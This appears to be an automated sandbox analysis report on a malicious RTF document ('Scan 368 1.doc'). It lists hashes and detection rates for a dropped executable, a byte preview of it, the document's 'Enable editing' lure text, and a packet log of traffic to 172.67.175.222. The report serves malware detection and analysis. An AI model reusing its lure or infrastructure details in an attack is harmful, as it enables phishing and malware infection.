                                                        MD5:A1B496997BE52302CB008BB93FABCFBF
                                                        SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
                                                        SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
                                                        SHA-512:4504C2B962069AABC8B33FA3DF57D1663C88E1BC8AB5FAA7B7D1D1EB22FCEF89E263FBB936A0B1DDDFBA59E82763A8FD919AB718B05A308688613E2018882ED5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                        • Antivirus: Virustotal, Detection: 47%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D f.................@..."......._... ........@.. ....................................@..................................^..W....`... ...........d...6........................................................... ............... ..H............text....?... ...@.................. ..`.rsrc.... ...`... ...B..............@..@.reloc...............b..............@..B.................^......H.......,....O......C....................................................0..A....... F........%.....(......... .........%./...(.....0...(....*.....&*...f.(.....s....}......}....*...0..........~0.....~.......o....~....%-.&~..........s....%.....(...+o.....+......E........d...3...d...j...............+.8.....o.....s......o.....o....&.. ..... ....Y..+...o........(....o......o...... ..... 01..Y..8u...s.......o.....o......+.+......E............9...h.......Z...................+...+..
                                                        Process:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):694792
                                                        Entropy (8bit):7.9653372839221515
                                                        Encrypted:false
                                                        SSDEEP:12288:/n1A7USCVbumqsPi4wousYMHrLEmhH9WNwClKmkDaW4JOQAmnkIlRz15C+ZkR:f1A7UPbumFjwo9nNBxC8GdymkIt5Q
                                                        MD5:A1B496997BE52302CB008BB93FABCFBF
                                                        SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
                                                        SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
                                                        SHA-512:4504C2B962069AABC8B33FA3DF57D1663C88E1BC8AB5FAA7B7D1D1EB22FCEF89E263FBB936A0B1DDDFBA59E82763A8FD919AB718B05A308688613E2018882ED5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                        • Antivirus: Virustotal, Detection: 47%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D f.................@..."......._... ........@.. ....................................@..................................^..W....`... ...........d...6........................................................... ............... ..H............text....?... ...@.................. ..`.rsrc.... ...`... ...B..............@..@.reloc...............b..............@..B.................^......H.......,....O......C....................................................0..A....... F........%.....(......... .........%./...(.....0...(....*.....&*...f.(.....s....}......}....*...0..........~0.....~.......o....~....%-.&~..........s....%.....(...+o.....+......E........d...3...d...j...............+.8.....o.....s......o.....o....&.. ..... ....Y..+...o........(....o......o...... ..... 01..Y..8u...s.......o.....o......+.+......E............9...h.......Z...................+...+..
                                                        File type:Rich Text Format data, version 1
                                                        Entropy (8bit):3.839982897943465
                                                        TrID:
                                                        • Rich Text Format (5005/1) 55.56%
                                                        • Rich Text Format (4004/1) 44.44%
                                                        File name:Scan 368 1.doc
                                                        File size:327'186 bytes
                                                        MD5:f22c33e0af52d382e821ff26fe23f30b
                                                        SHA1:15bdcdd580cbb66c67d8fd90151e25fc285f7de3
                                                        SHA256:50297c7705e690b43057219bc9a89cfb49e6d739742bbf4d904b64832b1cfefc
                                                        SHA512:18c1c6736ee9a5e5083cd8841a1fa1eb97a51947b63e919eb6516c4302778007f08efd149d2209bea6c35e8713003617a417e9725446ef18a707786a6677fafd
                                                        SSDEEP:3072:GQsXvKMEesXvKMEesXvKMEesXvKMEesXvKMEt955Rj5/BBRnLqOT:GhKMeKMeKMeKMeKM2j5/BBxLqOT
                                                        TLSH:2864142EE34E0269CB520377AA1B1E94A6FDBB3EB39051A1341C433533DD87D52266BD
                                                        File Content Preview:{\rtf1..{\*\wHjhgEYPJO9YHUDcXf1OwSqXtlqDBAx3EaJOL4ZgUrqE4jc6AY2Nr9UasMEPWOXbmJuGi}..{\483268256Document created in earlier version microsoft office word.To view or edit this document, please click ("Enable editing") from the yellow bar aboveASSIGNMENTMCS
                                                        Icon Hash:2764a3aaaeb7bdbf
                                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                        00001AFDBhno
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Apr 18, 2024 10:37:25.643904924 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.643934965 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:25.644001961 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.653523922 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.653537989 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:25.875663042 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:25.875916958 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.881525993 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.881539106 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:25.881877899 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:25.881933928 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.948772907 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:25.996129036 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.401974916 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402031898 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402065039 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402097940 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402097940 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402129889 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402162075 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402266979 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402296066 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402298927 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402298927 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402313948 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402427912 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402640104 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402689934 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402699947 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402729988 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402749062 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402756929 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.402780056 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.402803898 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.407316923 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.542727947 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.542788029 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.542792082 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.542804956 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.542831898 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.542845964 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543056011 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543095112 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543103933 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543143034 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543148994 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543195963 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543602943 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543653965 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543659925 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543699980 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543706894 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543741941 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543746948 CEST | 49163 | 443 | 192.168.2.22 | 172.67.175.222
                                                        Apr 18, 2024 10:37:26.543754101 CEST | 443 | 49163 | 172.67.175.222 | 192.168.2.22
                                                        Apr 18, 2024 10:37:26.543785095 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544373989 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544430971 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544435978 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544477940 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544485092 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544517040 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544518948 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544528961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544560909 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544568062 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544605970 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.545370102 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.545420885 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.545423031 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.545433998 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.545459032 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.545476913 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682527065 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682651043 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682670116 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682715893 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682718992 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682729006 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682760000 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682775974 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684278965 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684354067 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684362888 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684405088 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684412003 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684448004 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684453964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684489965 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684497118 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684530973 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684537888 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684556961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684571981 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684580088 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684592962 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684613943 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684621096 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684648991 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684657097 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684664011 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684689999 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684711933 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684804916 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685398102 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685453892 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685461044 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685471058 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685503960 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685503960 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685527086 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685534000 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685563087 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685580015 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.686260939 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.686326027 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.686333895 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.686383963 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687237978 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687303066 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687313080 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687330961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687355042 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687361002 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687375069 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687402010 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.688044071 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.688087940 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.688110113 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.688118935 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.688141108 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.688158989 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.823573112 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.823710918 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.823767900 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.823836088 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.824228048 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.824296951 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.825308084 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.825385094 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.825475931 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.825532913 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.825947046 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.826011896 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.826088905 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.826145887 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.826811075 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.826875925 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.826951981 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.827007055 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.827704906 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.827774048 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.827852964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.827903032 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.828608036 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.828676939 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.828751087 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.828814983 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.829498053 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.829575062 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.830292940 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.830363035 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.830410004 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.830476046 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.967942953 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968138933 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968156099 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968214989 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968226910 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968291044 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968687057 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968743086 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968859911 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968921900 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.969374895 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.969429970 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.970303059 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.970364094 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.970370054 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.970386028 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.970422029 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.971189022 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971245050 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.971252918 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971291065 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971292019 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.971304893 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971333981 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973006964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973016977 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973073006 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973082066 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973123074 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973850965 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973910093 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973911047 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973926067 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973947048 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973961115 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.974728107 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.974766016 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.974786997 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.974795103 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.974807978 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.974833012 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.975651026 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.975703955 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.975719929 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.975763083 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.976543903 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.976600885 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.976603985 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.976613998 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.976639986 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.976656914 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.977416039 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.977468967 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.978243113 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.978311062 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.978312016 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.978324890 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.978352070 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.978367090 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.979058027 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.979110956 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.979182005 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.979228020 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.980441093 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.980501890 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.980515957 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.980557919 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.981329918 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.981384039 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.981417894 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.981463909 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.983201981 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.983251095 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.983259916 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.983268976 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.983304024 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.983325958 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.113941908 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114020109 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114057064 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114074945 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114128113 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114128113 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114273071 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114320993 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114778042 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114840031 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.117082119 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.117152929 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.117152929 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.117172956 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.117207050 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.117239952 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.118839025 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.118905067 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.118911028 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.118927002 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.118972063 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.120630980 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.120698929 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.120703936 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.120718956 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.120759964 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.122482061 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.122545958 CEST49163443192.168.2.22172.67.175.222
